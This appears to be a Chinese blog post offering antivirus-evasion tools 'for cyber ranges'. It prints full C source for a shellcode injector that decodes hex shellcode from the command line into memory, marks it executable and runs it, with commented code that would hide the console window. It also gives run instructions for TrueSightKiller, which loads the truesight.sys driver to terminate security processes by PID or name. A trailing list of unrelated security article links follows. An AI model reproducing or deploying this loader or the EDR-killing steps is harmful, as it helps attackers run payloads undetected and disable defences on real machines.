靶场专用免杀工具

工具
SimpleShellcodeInjector

代码

bash 复制代码
#include <stdio.h>
#include <Windows.h>
int main(int argc, char* argv[]) {
   // HWND hWnd = GetConsoleWindow();
   // ShowWindow( hWnd, SW_HIDE );
    unsigned int char_in_hex;
    char* shellcode = argv[1];
    unsigned int iterations = strlen(shellcode);
    unsigned int memory_allocation = strlen(shellcode) / 2; 
    for (unsigned int i = 0; i < iterations - 1; i++) {
        sscanf(shellcode + 2 * i, "%2X", &char_in_hex);
        shellcode[i] = (char)char_in_hex;
    }
    void* exec = VirtualAlloc(0, memory_allocation, MEM_COMMIT, PAGE_READWRITE);
    memcpy(exec, shellcode, memory_allocation);
    DWORD ignore;
    VirtualProtect(exec, memory_allocation, PAGE_EXECUTE, &ignore);
    (*(void (*)()) exec)();
    return 0;
}

TrueSightKiller

自行编译后,将truesight.sys与编译之后的exe放在同一目录下,以管理员权限运行cmd

-p 指定pid,-n指定进程名


相关推荐
qyhua1 小时前
【Linux运维实战】彻底修复 CVE-2011-5094 漏洞
linux·运维·安全
Andya_net2 小时前
网络安全 | 深入了解 X.509 证书及其应用
服务器·安全·web安全
骥龙10 小时前
2.8、权限的终极目标:提权与持久化
安全·网络安全
SuperherRo12 小时前
JS逆向-安全辅助项目&Yakit热加载&魔术方法&模版插件语法&JSRpc进阶调用&接口联动
javascript·安全·yakit·jsrpc·热加载
梵得儿SHI13 小时前
Java 反射机制深度剖析:性能与安全性的那些坑
java·开发语言·安全·反射·动态代理·性能·反射机制
来旺13 小时前
互联网大厂Java面试全解析及三轮问答专项
java·数据库·spring boot·安全·缓存·微服务·面试
Brianna Home15 小时前
博客安全攻防演练:从攻击者视角构筑铜墙铁壁
网络·数据库·安全·oracle
施嘉伟16 小时前
SQL Server安全配置全面检查与优化方案
数据库·安全
Andya_net17 小时前
网络安全 | SSL/TLS 证书文件格式详解:PEM、CRT、CER、DER、PKI、PKCS12
安全·web安全·ssl
newxtc1 天前
【昆明市不动产登记中心-注册安全分析报告】
人工智能·安全